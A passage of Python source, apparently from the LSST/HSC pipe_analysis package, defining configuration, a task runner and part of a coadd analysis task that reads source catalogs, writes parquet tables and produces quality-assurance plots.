doc=\"Reference object loader for astrometry\")\n photomRefObjLoader = ConfigurableField(target=LoadIndexedReferenceObjectsTask,\n doc=\"Reference object loader for photometry\")\n doPlotMags = Field(dtype=bool, default=True, doc=\"Plot magnitudes? (ignored if plotMatchesOnly is True)\")\n doPlotSizes = Field(dtype=bool, default=True, doc=\"Plot PSF sizes? (ignored if plotMatchesOnly is True)\")\n doPlotCentroids = Field(dtype=bool, default=True, doc=(\"Plot centroids? \"\n \"(ignored if plotMatchesOnly is True)\"))\n doApCorrs = Field(dtype=bool, default=True, doc=(\"Plot aperture corrections? \"\n \"(ignored if plotMatchesOnly is True)\"))\n doBackoutApCorr = Field(dtype=bool, default=False, doc=\"Backout aperture corrections?\")\n doAddAperFluxHsc = Field(dtype=bool, default=False,\n doc=\"Add a field containing 12 pix circular aperture flux to HSC table?\")\n doPlotStarGalaxy = Field(dtype=bool, default=True, doc=(\"Plot star/galaxy? \"\n \"(ignored if plotMatchesOnly is True)\"))\n doPlotOverlaps = Field(dtype=bool, default=True, doc=(\"Plot overlaps? \"\n \"(ignored if plotMatchesOnly is True)\"))\n plotMatchesOnly = Field(dtype=bool, default=False, doc=(\"Only make plots related to reference cat\"\n \"matches?\"))\n doPlotMatches = Field(dtype=bool, default=True, doc=\"Plot matches?\")\n doPlotCompareUnforced = Field(dtype=bool, default=True, doc=(\"Plot difference between forced and unforced\"\n \"? 
(ignored if plotMatchesOnly is True)\"))\n doPlotRhoStatistics = Field(dtype=bool, default=True, doc=(\"Plot Rho statistics?\"))\n treecorrParams = DictField(keytype=str, itemtype=None, optional=True,\n default={\"nbins\": 11, \"min_sep\": 0.5, \"max_sep\": 20,\n \"sep_units\": \"arcmin\", \"verbose\": 0},\n doc=(\"keyword arguments to be passed to treecorr,\"\n \"if doPlotRhoStatistics is True\"))\n doPlotQuiver = Field(dtype=bool, default=True, doc=(\"Plot ellipticity residuals quiver plot? \"\n \"(ignored if plotMatchesOnly is True)\"))\n doPlotPsfFluxSnHists = Field(dtype=bool, default=True, doc=\"Plot histograms of raw PSF fluxes and S/N?\")\n doPlotFootprintArea = Field(dtype=bool, default=True, doc=(\"Plot histogram of footprint area? \"\n \"(ignored if plotMatchesOnly is True)\"))\n doPlotInputCounts = Field(dtype=bool, default=True, doc=(\"Make input counts plot? \"\n \"(ignored if plotMatchesOnly is True)\"))\n doPlotSkyObjects = Field(dtype=bool, default=True, doc=\"Make sky object plots?\")\n doPlotSkyObjectsSky = Field(dtype=bool, default=False, doc=\"Make sky projection sky object plots?\")\n onlyReadStars = Field(dtype=bool, default=False, doc=\"Only read stars (to save memory)?\")\n toMilli = Field(dtype=bool, default=True, doc=\"Print stats in milli units (i.e. mas, mmag)?\")\n srcSchemaMap = DictField(keytype=str, itemtype=str, default=None, optional=True,\n doc=\"Mapping between different stack (e.g. HSC vs. LSST) schema names\")\n fluxToPlotList = ListField(dtype=str, default=[\"base_GaussianFlux\", \"base_CircularApertureFlux_12_0\",\n \"ext_photometryKron_KronFlux\", \"modelfit_CModel\"],\n doc=\"List of fluxes to plot: mag(flux)-mag(base_PsfFlux) vs mag(fluxColumn)\")\n gaapFluxList = ListField(dtype=str, default=[\"ext_gaap_GaapFlux_1_15x_Optimal\",\n \"ext_gaap_GaapFlux_1_15x_PsfFlux\"],\n doc=\"List of possible GAaP fluxes to add to fluxToPlotList\")\n # We want the following to come from the *_meas catalogs as they reflect\n # what happened in SFP calibration.\n columnsToCopyFromMeas = ListField(dtype=str, default=[\"calib_\", \"deblend_parentNPeaks\", \"deblend_nPeaks\",\n \"deblend_scarletFlux\", \"deblend_skipped\"],\n doc=\"List of string \\\"prefixes\\\" to identify the columns to copy. \"\n \"All columns with names that start with one of these strings will be \"\n \"copied from the *_meas catalogs into the *_forced_src catalogs \"\n \"UNLESS the full column name contains one of the strings listed \"\n \"in the notInColumnStrList config.\")\n # We want the following to come from the *_ref catalogs as they reflect\n # the forced measurement states.\n columnsToCopyFromRef = ListField(dtype=str,\n default=[\"detect_\", \"merge_peak_sky\", \"merge_measurement_\", ],\n doc=\"List of string \\\"prefixes\\\" to identify the columns to copy. 
\"\n \"All columns with names that start with one of these strings will be \"\n \"copied from the *_ref catalogs into the *_forced_src catalogs \"\n \"UNLESS the full column name contains one of the strings listed \"\n \"in the notInColumnStrList config.\")\n baseColStrList = ListField(\n dtype=str,\n default=[\"coord\", \"tract\", \"patch\", \"visit\", \"ccd\", \"base_PixelFlags\", \"base_GaussianFlux\",\n \"base_PsfFlux\", \"base_CircularApertureFlux_9_0_instFlux\", \"base_CircularApertureFlux_12_0\",\n \"base_CircularApertureFlux_25_0\", \"ext_photometryKron_KronFlux\", \"modelfit_CModel\",\n \"base_Sdss\", \"slot_Centroid\", \"slot_Shape\", \"ext_shapeHSM_HsmSourceMoments_\",\n \"ext_shapeHSM_HsmPsfMoments_\", \"ext_shapeHSM_HsmShapeRegauss_\", \"base_Footprint\",\n \"base_FPPosition\", \"base_ClassificationExtendedness\", \"parent\", \"detect\", \"deblend_nChild\",\n \"deblend_parentNPeaks\", \"deblend_nPeaks\", \"deblend_scarletFlux\", \"deblend_skipped\",\n \"base_Blendedness_abs\", \"base_Blendedness_flag\", \"base_InputCount\",\n \"merge_peak_sky\", \"merge_measurement\", \"calib\", \"sky_source\",\n \"ext_gaap_GaapFlux_1_15x_Optimal_\", \"ext_gaap_GaapFlux_1_15x_PsfFlux_\"],\n doc=(\"List of \\\"startswith\\\" strings of column names to load from deepCoadd_obj parquet table. \"\n \"All columns that start with one of these strings will be loaded UNLESS the full column \"\n \"name contains one of the strings listed in the notInColumnStrList config.\"))\n notInColStrList = ListField(\n dtype=str,\n default=[\"flag_bad\", \"flag_no\", \"missingDetector_flag\", \"_region_\", \"Truncated\", \"_radius\",\n \"_bad_\", \"initial\", \"_exp_\", \"_dev_\", \"fracDev\", \"objective\", \"SdssCentroid_flag_\",\n \"SdssShape_flag_u\", \"SdssShape_flag_m\", \"_Cov\", \"_child_\", \"_parent_\"],\n doc=(\"List of substrings to select against when creating list of columns to load from the \"\n \"deepCoadd_obj parquet table.\"))\n flagsToAlias = DictField(keytype=str, itemtype=str,\n default={\"calib_psf_used\": \"calib_psfUsed\",\n \"calib_psf_candidate\": \"calib_psfCandidate\",\n \"calib_astrometry_used\": \"calib_astrometryUsed\"},\n doc=(\"List of flags to alias to old, pre-RFC-498, names for backwards \"\n \"compatibility with old processings\"))\n doReadParquetTables = Field(dtype=bool, default=True,\n doc=(\"Read parquet tables from postprocessing (e.g. deepCoadd_obj) as \"\n \"input data instead of afwTable catalogs.\"))\n doWriteParquetTables = Field(dtype=bool, default=True,\n doc=(\"Write out Parquet tables (for subsequent interactive analysis)?\"\n \"\\nNOTE: if True but fastparquet package is unavailable, a warning is \"\n \"issued and table writing is skipped.\"))\n writeParquetOnly = Field(dtype=bool, default=False,\n doc=\"Only write out Parquet tables (i.e. 
do not produce any plots)?\")\n hasFakes = Field(dtype=bool, default=False, doc=\"Include the analysis of the added fake sources?\")\n readFootprintsAs = Field(dtype=str, default=None, optional=True,\n doc=(\"What type of Footprint to read in along with the catalog: \"\n \"\\n None : do not read in Footprints.\"\n \"\\n\\\"light\\\": read in regular Footprints (include SpanSet and list of\"\n \"\\n peaks per Footprint).\"\n \"\\n\\\"heavy\\\": read in HeavyFootprints (include regular Footprint plus\"\n \"\\n flux values per Footprint).\"))\n\n def saveToStream(self, outfile, root=\"root\"):\n \"\"\"Required for loading colorterms from a Config outside the \"lsst\"\n namespace.\n \"\"\"\n print(\"import lsst.meas.photocal.colorterms\", file=outfile)\n return Config.saveToStream(self, outfile, root)\n\n def setDefaults(self):\n Config.setDefaults(self)\n\n def validate(self):\n Config.validate(self)\n if self.writeParquetOnly and not self.doWriteParquetTables:\n raise ValueError(\"Cannot writeParquetOnly if doWriteParquetTables is False\")\n if self.hasFakes and self.doReadParquetTables:\n raise ValueError(\"Have not yet accommodated parquet reading for fakes catalogs. \"\n \"Try running with doReadParquetTables=False\")\n if self.plotMatchesOnly:\n self.doPlotMatches = True\n if self.plotMatchesOnly or self.writeParquetOnly:\n self.doPlotOverlaps = False\n self.doPlotCompareUnforced = False\n self.doPlotPsfFluxSnHists = False\n self.doPlotSkyObjectsSky = False\n self.doPlotSkyObjects = False\n self.doPlotFootprintArea = False\n self.doPlotRhoStatistics = False\n self.doPlotQuiver = False\n self.doPlotInputCounts = False\n self.doPlotMags = False\n self.doPlotStarGalaxy = False\n self.doPlotSizes = False\n self.doPlotCentroids = False\n\n # Set the astrometry reference catalog parameters based on configs\n if \"gaia\" in self.astromRefCat:\n if len(self.astromRefCat) == len(\"gaia\"):\n self.astromRefObjLoader.ref_dataset_name = \"gaia_dr2_20200414\"\n else:\n self.astromRefObjLoader.ref_dataset_name = self.astromRefCat\n self.astromRefObjLoader.anyFilterMapsToThis = \"phot_g_mean\"\n self.astromRefObjLoader.requireProperMotion = True\n elif \"ps1\" in self.astromRefCat:\n if len(self.astromRefCat) == len(\"ps1\"):\n self.astromRefObjLoader.ref_dataset_name = \"ps1_pv3_3pi_20170110\"\n else:\n self.astromRefObjLoader.ref_dataset_name = self.astromRefCat\n elif \"ref_cat\" in self.astromRefCat:\n self.astromRefObjLoader.ref_dataset_name = self.astromRefCat\n else:\n raise RuntimeError(\"Unknown astrometry reference catatlog name. Can be either gaia \"\n \"(or gaia_version_date) or ps1 (or ps1_version_date), but got {}\".\n format(self.astromRefCat))\n # Set the photometry reference catalog parameters based on configs\n if \"ps1\" in self.photomRefCat:\n if len(self.photomRefCat) == len(\"ps1\"):\n self.photomRefObjLoader.ref_dataset_name = \"ps1_pv3_3pi_20170110\"\n else:\n self.photomRefObjLoader.ref_dataset_name = self.photomRefCat\n elif \"ref_cat\" in self.photomRefCat:\n self.astromRefObjLoader.ref_dataset_name = self.photomRefCat\n else:\n raise RuntimeError(\"Unknown photometry reference catatlog name. 
Must be ps1 or \"\n \"ps1_version_date, but got {}\".format(self.photomRefCat))\n\n\nclass CoaddAnalysisRunner(TaskRunner):\n @staticmethod\n def getTargetList(parsedCmd, **kwargs):\n kwargs[\"cosmos\"] = parsedCmd.cosmos\n kwargs[\"subdir\"] = parsedCmd.subdir\n\n idParser = parsedCmd.id.__class__(parsedCmd.id.level)\n idParser.idList = parsedCmd.id.idList\n idParser.datasetType = parsedCmd.id.datasetType\n idParser.makeDataRefList(parsedCmd)\n\n # Check for existence of appropriate dataset: parquet obj vs. afwTable\n # catalogs.\n datasetList = [\"obj\"] if parsedCmd.config.doReadParquetTables else [\"forced_src\", \"meas\"]\n # Partition all inputs by tract,filter\n FilterRefsDict = functools.partial(defaultdict, list) # Dict for filter-->dataRefs\n\n if parsedCmd.collection is not None:\n repoRootDir = \"/repo/dc2\" if parsedCmd.instrument == \"LSSTCam-imSim\" else \"/repo/main\"\n if parsedCmd.instrument is None:\n raise RuntimeError(\"Must provide --instrument command line option for gen3 repos.\")\n butlerGen3 = dafButler.Butler(repoRootDir, collections=parsedCmd.collection,\n instrument=parsedCmd.instrument)\n butlerGen2 = parsedCmd.butler\n parsedCmd.butler = butlerGen3\n kwargs[\"butlerGen2\"] = butlerGen2\n\n tract = parsedCmd.id.refList[0][0].dataId[\"tract\"]\n skyMap = butlerGen3.get(\"skyMap\")\n tractInfo = skyMap.generateTract(tract)\n # Create a mapping from N,N patchId of Gen2 to integer id of Gen3\n patchIdToGen3Map = {}\n for patch in tractInfo:\n patchIndexStr = str(patch.getIndex()[0]) + \",\" + str(patch.getIndex()[1])\n patchIdToGen3Map[patchIndexStr] = tractInfo.getSequentialPatchIndex(patch)\n\n tractFilterRefs = defaultdict(FilterRefsDict) # tract-->filter-->dataRefs\n patchList = []\n gen3RefList = []\n for pId in parsedCmd.id.refList[0]:\n patchList.append(pId.dataId[\"patch\"])\n\n gen3PidList = idParser.idList.copy()\n if len(gen3PidList) == 1 and len(gen3PidList) < len(patchList):\n gen3PidList = gen3PidList*len(patchList)\n for gen3Pid, patchId in zip(gen3PidList, patchList):\n gen3PidCopy = copy.deepcopy(gen3Pid)\n if \"filter\" in gen3PidCopy:\n gen3PidCopy[\"physical_filter\"] = gen3PidCopy.pop(\"filter\")\n physical_filter = gen3PidCopy[\"physical_filter\"]\n if parsedCmd.instrument == \"HSC\":\n gen3PidCopy[\"band\"] = filterToBandMap[gen3PidCopy[\"physical_filter\"]]\n gen3PidCopy[\"skymap\"] = \"hsc_rings_v1\"\n elif parsedCmd.instrument == \"LSSTCam-imSim\":\n gen3PidCopy[\"band\"] = gen3PidCopy[\"physical_filter\"]\n gen3PidCopy[\"skymap\"] = \"DC2\"\n else:\n raise RuntimeError(\"Unknown instrument {}. Currently only know HSC and \"\n \"LSSTCam-imSim.\".format(parsedCmd.instrument))\n gen3PidCopy[\"dataId\"] = gen3PidCopy.copy()\n gen3PidCopy[\"butler\"] = butlerGen3\n gen3PidCopy[\"patchId\"] = patchId\n gen3PidCopy[\"patch\"] = patchIdToGen3Map[patchId]\n gen3PidCopy[\"dataId\"][\"patch\"] = patchIdToGen3Map[patchId]\n gen3PidCopy[\"camera\"] = parsedCmd.instrument\n gen3RefList.append(gen3PidCopy)\n tractFilterRefs[tract][physical_filter] = gen3RefList\n else:\n # Make sure the actual input files requested exist (i.e. do not\n # follow the parent chain). If reading afwTable catalogs, first\n # check for forced catalogs. Break out of datasets loop if forced\n # catalogs were found, otherwise continue search for existence of\n # unforced (i.e. 
meas) catalogs.\n for dataset in datasetList:\n tractFilterRefs = defaultdict(FilterRefsDict) # tract-->filter-->dataRefs\n for patchRef in sum(parsedCmd.id.refList, []):\n tract = patchRef.dataId[\"tract\"]\n filterName = patchRef.dataId[\"filter\"]\n inputDataFile = patchRef.get(\"deepCoadd_\" + dataset + \"_filename\")[0]\n if parsedCmd.input not in parsedCmd.output:\n inputDataFile = inputDataFile.replace(parsedCmd.output, parsedCmd.input)\n if os.path.exists(inputDataFile):\n tractFilterRefs[tract][filterName].append(patchRef)\n if tractFilterRefs:\n break\n\n if not tractFilterRefs:\n raise RuntimeError(\"No suitable datasets found.\")\n\n return [(tractFilterRefs[tract][filterName], kwargs) for tract in tractFilterRefs for\n filterName in tractFilterRefs[tract]]\n\n\nclass CoaddAnalysisTask(CmdLineTask):\n _DefaultName = \"coaddAnalysis\"\n ConfigClass = CoaddAnalysisConfig\n RunnerClass = CoaddAnalysisRunner\n AnalysisClass = Analysis\n outputDataset = \"plotCoadd\"\n\n @classmethod\n def _makeArgumentParser(cls):\n parser = ArgumentParser(name=cls._DefaultName)\n parser.add_argument(\"--cosmos\", default=None, help=\"Filename for Leauthaud Cosmos catalog\")\n parser.add_argument(\"--collection\", required=False, default=None,\n help=\"Collection for rerun if it is Gen3. NOTE: must still point to a gen2 \"\n \"input to get a valid parsed data reference list and a gen2-stlye rerun for \"\n \"plot persistence. E.g. \"\n \"/datasets/hsc/repo/ --rerun RC/w_2021_NN/DM-NNNNN:private/username/outDir \"\n \"--collection HSC/runs/RC2/w_2021_NN/DM-NNNNN --instrument HSC or \"\n \"/datasets/DC2/repoRun2.2i \"\n \"--rerun w_2021_NN/DM-NNNNN/multi:private/username/outDir \"\n \" --collection 2.2i/runs/test-med-1/w_2021_NN/DM-NNNNN \"\n \"--instrument LSSTCam-imSim\")\n parser.add_argument(\"--instrument\", required=False, default=None,\n help=\"Instrument for run if it is Gen3\")\n parser.add_id_argument(\"--id\", \"deepCoadd_meas\",\n help=\"data ID, e.g. --id tract=12345 patch=1,2 filter=HSC-X\",\n ContainerClass=TractDataIdContainer)\n parser.add_argument(\"--subdir\", type=str, default=\"\",\n help=(\"Subdirectory below plots/filter/tract-NNNN/ (useful for, \"\n \"e.g., subgrouping of Patches. Ignored if only one Patch is \"\n \"specified, in which case the subdir is set to patch-NNN\"))\n return parser\n\n def __init__(self, *args, **kwargs):\n CmdLineTask.__init__(self, *args, **kwargs)\n self.zpLabel = None\n self.unitScale = 1000.0 if self.config.toMilli else 1.0\n self.matchRadius = self.config.matchRadiusXy if self.config.matchXy else self.config.matchRadiusRaDec\n self.matchRadiusUnitStr = \" (pixels)\" if self.config.matchXy else \"\\\"\"\n\n self.verifyJob = verify.Job.load_metrics_package(subset=\"pipe_analysis\")\n\n def runDataRef(self, patchRefList, subdir=\"\", cosmos=None, butlerGen2=None):\n plotList = []\n dataset = \"Coadd_obj\" if self.config.doReadParquetTables else \"Coadd_forced_src\"\n haveForced = False # do forced datasets exits (may not for single band datasets)\n patchRefExistsList = []\n for patchRef in patchRefList:\n if hasattr(patchRef, \"dataId\"):\n dataId = patchRef.dataId\n if patchRef.datasetExists(self.config.coaddName + dataset):\n patchRefExistsList.append(patchRef)\n else:\n dataId = patchRef[\"dataId\"]\n try:\n patchRef[\"butler\"].getURI(self.config.coaddName + dataset, dataId=dataId)\n except LookupError:\n self.log.warning(\"No {} found for {}. Skipping patch... 
\".\n format(self.config.coaddName + dataset, dataId))\n continue\n if \"_obj\" in dataset:\n cat = patchRef[\"butler\"].get(self.config.coaddName + dataset, dataId=dataId)\n if dataId[\"band\"] in cat.columns.levels[1]:\n patchRefExistsList.append(patchRef)\n else:\n patchRefExistsList.append(patchRef)\n\n if len(patchRefExistsList) == 0:\n raise TaskError(\"No data exists for {}\".format(dataset))\n\n if len(patchRefExistsList) > 0:\n haveForced = True\n else:\n self.log.warning(\"No forced dataset exists for, e.g.,: {:} (only showing first dataId in \"\n \"patchRefList).\\nPlotting unforced results only.\".format(dataId))\n dataset = \"Coadd_meas\"\n if not patchRefList[0].datasetExists(self.config.coaddName + dataset):\n raise TaskError(\"No data exists in patRefList: %s\" %\n ([patchRef.dataId for patchRef in patchRefList]))\n\n repoInfo = getRepoInfo(patchRefExistsList[0], coaddName=self.config.coaddName, coaddDataset=dataset)\n # Explicit input file was checked in CoaddAnalysisRunner, so a check\n # on datasetExists is sufficient here (modulo the case where a forced\n # dataset exists higher up the parent tree than the specified input,\n # but does not exist in the input directory as the former will be\n # found).\n dataId = patchRefExistsList[0][\"dataId\"] if repoInfo.isGen3 else patchRefExistsList[0].dataId\n\n forcedStr = \"forced\" if haveForced else \"unforced\"\n if self.config.doBackoutApCorr:\n self.log.info(\"Backing out aperture corrections from all fluxes\")\n forcedStr += \"\\n (noApCorr)\"\n\n if not repoInfo.isGen3:\n patchList = [patchRef.dataId[\"patch\"] for patchRef in patchRefExistsList]\n patchIdList = patchList\n else:\n patchList = [patchRef[\"dataId\"][\"patch\"] for patchRef in patchRefExistsList]\n patchIdList = [patchRef[\"patchId\"] for patchRef in patchRefExistsList]\n self.log.info(\"patchList size: {:d}\".format(len(patchList)))\n\n subdir = \"patch-\" + str(patchList[0]) if len(patchList) == 1 else subdir\n repoInfo.dataId[\"subdir\"] = \"/\" + subdir\n\n plotInfoDict = getPlotInfo(repoInfo)\n plotInfoDict.update(dict(plotType=\"plotCoadd\", subdir=subdir, patchList=patchList,\n patchIdList=patchIdList, hscRun=repoInfo.hscRun,\n tractInfo=repoInfo.tractInfo, dataId=repoInfo.dataId, ccdList=None))\n # Find a visit/ccd input so that you can check for meas_mosaic input\n # (i.e. 
to set uberCalLabel).\n self.uberCalLabel = determineExternalCalLabel(repoInfo, patchList[0], coaddName=self.config.coaddName)\n self.log.info(f\"External calibration(s) used: {self.uberCalLabel}\")\n\n # Set some aliases for differing schema naming conventions\n aliasDictList = [self.config.flagsToAlias, ]\n if repoInfo.hscRun and self.config.srcSchemaMap is not None:\n aliasDictList += [self.config.srcSchemaMap]\n\n # Always highlight points with x-axis flag set (for cases where\n # they do not get explicitly filtered out).\n highlightList = [(self.config.analysis.fluxColumn.replace(\"_instFlux\", \"_flag\"), 0, \"turquoise\")]\n for ih, flagName in enumerate(list(self.config.analysis.flags)):\n if not any(flagName in highlight for highlight in highlightList):\n highlightList += [(flagName, 0, FLAGCOLORS[ih%len(FLAGCOLORS)]), ]\n # Dict of all parameters common to plot* functions\n plotKwargs = dict(zpLabel=self.zpLabel, uberCalLabel=self.uberCalLabel)\n\n if any(doPlot for doPlot in\n [self.config.doPlotOverlaps, self.config.doPlotCompareUnforced,\n self.config.doPlotPsfFluxSnHists, self.config.doPlotSkyObjects,\n self.config.doPlotSkyObjectsSky, self.config.doPlotFootprintArea,\n self.config.doPlotMags, self.config.doPlotStarGalaxy,\n self.config.doPlotRhoStatistics, cosmos, self.config.externalCatalogs,\n self.config.doWriteParquetTables]) and not self.config.plotMatchesOnly:\n\n if self.config.doReadParquetTables:\n if haveForced:\n forced, _ = self.readParquetTables(patchRefExistsList, self.config.coaddName + dataset,\n repoInfo, dfDataset=\"forced_src\")\n unforced, _ = self.readParquetTables(patchRefExistsList, self.config.coaddName + dataset,\n repoInfo, dfDataset=\"meas\")\n areaDict, _ = computeAreaDict(repoInfo, patchRefExistsList,\n dataset=self.config.coaddName + \"Coadd\", fakeCat=None)\n else:\n catalogStruct = self.readAfwCoaddTables(patchRefExistsList, repoInfo, haveForced,\n aliasDictList=aliasDictList)\n unforced = catalogStruct.unforced\n forced = catalogStruct.forced\n areaDict = catalogStruct.areaDict\n\n patchExistsList = []\n patchIdExistsList = []\n for patchRef in patchRefExistsList:\n patch = patchRef[\"dataId\"][\"patch\"] if repoInfo.isGen3 else patchRef.dataId[\"patch\"]\n patchId = patchRef[\"patchId\"] if repoInfo.isGen3 else patchRef.dataId[\"patch\"]\n patchExistsList.append(patch)\n patchIdExistsList.append(patchId)\n plotInfoDict.update(dict(patchIdList=patchIdExistsList))\n self.log.info(\"List of patches for which data exists: {}\".format(patchIdExistsList))\n\n plotKwargs.update(dict(zpLabel=self.zpLabel))\n unforcedSchema = getSchema(unforced)\n if haveForced:\n forcedSchema = getSchema(forced)\n\n # Make sub-catalog of sky objects before flag culling as many of\n # these will have flags set due to measurement difficulties in\n # regions that are really blank sky.\n if self.config.doPlotSkyObjectsSky:\n skyObjCatAll = unforced[unforced[\"merge_peak_sky\"]].copy(deep=True)\n if self.config.doPlotSkyObjects:\n baseGoodSky = (unforced[\"merge_peak_sky\"] & (unforced[\"base_InputCount_value\"] > 0)\n & ~unforced[\"base_PixelFlags_flag_edge\"])\n if \"detect_isDeblendedSource\" in unforcedSchema:\n baseGoodSky &= unforced[\"detect_isDeblendedSource\"]\n skyObjCat = unforced[baseGoodSky].copy(deep=True)\n\n # Must do the overlaps before purging the catalogs of non-primary\n # sources. 
We only really need one set of these plots and the\n # matching takes a fair amount of time, so only plot for one\n # catalog, favoring the forced catalog if it exists.\n if self.config.doPlotOverlaps:\n # Determine if any patches in patchExistsList actually overlap\n overlappingPatches = checkPatchOverlap(plotInfoDict[\"patchList\"], plotInfoDict[\"tractInfo\"])\n if not overlappingPatches:\n self.log.info(\"No overlapping patches...skipping overlap plots\")\n else:\n if haveForced:\n forcedOverlaps = self.overlaps(forced, patchExistsList, repoInfo.tractInfo)\n if forcedOverlaps is not None:\n plotList.append(self.plotOverlaps(forcedOverlaps, plotInfoDict, areaDict,\n matchRadius=self.config.matchOverlapRadius,\n matchRadiusUnitStr=\"\\\"\",\n forcedStr=forcedStr, postFix=\"_forced\",\n fluxToPlotList=[\"modelfit_CModel\", ],\n highlightList=highlightList, **plotKwargs))\n self.log.info(\"Number of forced overlap objects matched = {:d}\".\n format(len(forcedOverlaps)))\n else:\n self.log.info(\"No forced overlap objects matched. Overlap plots skipped.\")\n else:\n unforcedOverlaps = self.overlaps(unforced, patchExistsList, repoInfo.tractInfo)\n if unforcedOverlaps is not None:\n plotList.append(\n self.plotOverlaps(unforcedOverlaps, plotInfoDict, areaDict,\n matchRadius=self.config.matchOverlapRadius,\n matchRadiusUnitStr=\"\\\"\",\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n postFix=\"_unforced\", fluxToPlotList=[\"modelfit_CModel\", ],\n highlightList=highlightList, **plotKwargs))\n self.log.info(\"Number of unforced overlap objects matched = {:d}\".\n format(len(unforcedOverlaps)))\n else:\n self.log.info(\"No unforced overlap objects matched. Overlap plots skipped.\")\n\n # Set boolean array indicating sources deemed unsuitable for qa\n # analyses.\n badUnforced = makeBadArray(unforced, onlyReadStars=self.config.onlyReadStars)\n if haveForced:\n badForced = makeBadArray(forced, onlyReadStars=self.config.onlyReadStars)\n badCombined = (badUnforced | badForced)\n unforcedMatched = unforced[~badCombined].copy(deep=True)\n forcedMatched = forced[~badCombined].copy(deep=True)\n\n if self.config.doPlotCompareUnforced:\n plotList.append(self.plotCompareUnforced(forcedMatched, unforcedMatched, plotInfoDict,\n areaDict, highlightList=highlightList,\n **plotKwargs))\n\n if repoInfo.isGen3: # Add back in filter to dataId so gen2 templates work for putting.\n repoInfo.dataId[\"filter\"] = repoInfo.dataId[\"physical_filter\"]\n # Create and write parquet tables\n if self.config.doWriteParquetTables:\n if haveForced:\n # Add pre-computed columns for parquet tables\n forced = addPreComputedColumns(forced, fluxToPlotList=self.config.fluxToPlotList,\n toMilli=self.config.toMilli, unforcedCat=unforced)\n if repoInfo.isGen3:\n dataRef_forced = butlerGen2.dataRef(\"analysisCoaddTable_forced\",\n dataId=repoInfo.dataId)\n else:\n dataRef_forced = repoInfo.butler.dataRef(\"analysisCoaddTable_forced\",\n dataId=repoInfo.dataId)\n writeParquet(dataRef_forced, forced, badArray=badForced)\n if repoInfo.isGen3:\n dataRef_unforced = butlerGen2.dataRef(\"analysisCoaddTable_unforced\",\n dataId=repoInfo.dataId)\n else:\n dataRef_unforced = repoInfo.butler.dataRef(\"analysisCoaddTable_unforced\",\n dataId=repoInfo.dataId)\n # Add pre-computed columns for parquet tables\n unforced = addPreComputedColumns(unforced, fluxToPlotList=self.config.fluxToPlotList,\n toMilli=self.config.toMilli)\n writeParquet(dataRef_unforced, unforced, badArray=badUnforced)\n if self.config.writeParquetOnly and not 
self.config.doPlotMatches:\n self.log.info(\"Exiting after writing Parquet tables. No plots generated.\")\n return\n\n if not self.config.writeParquetOnly:\n # Purge the catalogs of flagged sources\n unforced = unforced[~badUnforced].copy(deep=True)\n if haveForced:\n forced = forced[~badForced].copy(deep=True)\n else:\n forced = unforced\n self.catLabel = \" scarlet\" if \"deblend_scarletFlux\" in unforcedSchema else \" nChild = 0\"\n strIndex = forcedStr.find(\"\\n\")\n if strIndex < 0:\n forcedStr = forcedStr + self.catLabel\n else:\n forcedStr = forcedStr[:strIndex] + \" \" + self.catLabel + forcedStr[strIndex:]\n if haveForced:\n self.log.info(\"\\nNumber of sources in catalogs: unforced = {0:d} and forced = {1:d}\".\n format(len(unforced), len(forced)))\n else:\n self.log.info(\"\\nNumber of sources in catalog: unforced = {0:d}\".format(len(unforced)))\n\n if self.config.doPlotPsfFluxSnHists:\n plotList.append(self.plotPsfFluxSnHists(unforced, \"base_PsfFlux_cal\", plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n **plotKwargs))\n if self.config.doPlotSkyObjects:\n plotList.append(self.plotSkyObjects(skyObjCat, \"skyObjects\", plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\")))\n if self.config.doPlotSkyObjectsSky:\n plotList.append(self.plotSkyObjectsSky(skyObjCatAll, \"skyObjects\", plotInfoDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n alpha=0.7, doPlotTractImage=True,\n doPlotPatchOutline=True, sizeFactor=3.0,\n maxDiamPix=1000))\n\n if self.config.doPlotFootprintArea:\n if \"base_FootprintArea_value\" in unforcedSchema:\n plotList.append(self.plotFootprintHist(unforced, \"footArea\", plotInfoDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n **plotKwargs))\n plotList.append(self.plotFootprint(unforced, plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n highlightList=highlightList, **plotKwargs))\n else:\n self.log.info(\"config.doPlotFootprintArea is True, but do not have \"\n \"base_FootprintArea_value in schema...skipping footArea plots.\")\n\n if self.config.doPlotRhoStatistics:\n plotList.append(self.plotRhoStatistics(unforced, plotInfoDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n **plotKwargs))\n\n if self.config.doPlotQuiver:\n plotList.append(self.plotQuiver(unforced, \"ellipResids\", plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n scale=2, **plotKwargs))\n\n if self.config.doPlotInputCounts:\n plotList.append(self.plotInputCounts(unforced, \"inputCounts\", plotInfoDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n alpha=0.5, doPlotPatchOutline=True, sizeFactor=5.0,\n maxDiamPix=1000, **plotKwargs))\n\n plotKwargs.update(dict(highlightList=highlightList))\n if self.config.doPlotMags:\n plotList.append(self.plotMags(unforced, plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n postFix=\"_unforced\", **plotKwargs))\n if haveForced:\n plotKwargs.update(dict(highlightList=highlightList\n + [(\"merge_measurement_\" + repoInfo.genericBandName, 0,\n \"yellow\")]))\n fluxToPlotList = [flux for flux in self.config.fluxToPlotList]\n for gaapFlux in self.config.gaapFluxList:\n haveGaap = gaapFlux + \"_instFlux\" in forcedSchema\n if haveGaap:\n fluxToPlotList.append(gaapFlux)\n plotList.append(self.plotMags(forced, plotInfoDict, areaDict, forcedStr=forcedStr,\n fluxToPlotList=fluxToPlotList, postFix=\"_forced\",\n **plotKwargs))\n 
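# --- Editor's illustrative aside (not part of pipe_analysis) ------------------
# The highlightList handling in runDataRef pairs each QA flag column with a
# "bad" value and a plot colour, cycling through the module-level FLAGCOLORS
# palette by modulo indexing so any number of flags can be accommodated while
# already-present flags are skipped. A minimal standalone sketch of that
# pattern; the flag names below are placeholders, not the configured set:
FLAGCOLORS = ["yellow", "greenyellow", "aquamarine", "orange",
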